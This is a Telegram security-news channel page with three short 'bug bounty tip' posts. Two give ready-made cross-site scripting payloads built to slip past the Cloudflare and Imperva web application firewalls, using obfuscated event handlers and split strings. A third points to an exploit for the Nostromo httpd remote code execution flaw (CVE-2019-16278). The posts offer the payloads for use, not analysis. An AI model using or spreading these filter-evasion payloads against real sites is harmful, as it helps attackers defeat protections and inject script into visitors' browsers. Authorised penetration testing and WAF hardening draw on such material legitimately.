Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
cloudflare «XSS» payload to bypass protection.
🦍


{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

#BugBounty #BugBountyTip #WAF #infosec

@sec_nerd
Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space




#waf
#web
#pentest



@sec_nerd
Nostromo httpd RCE vulnerability (CVE-2019-16278) #bugbountytips

https://github.com/jas502n/CVE-2019-16278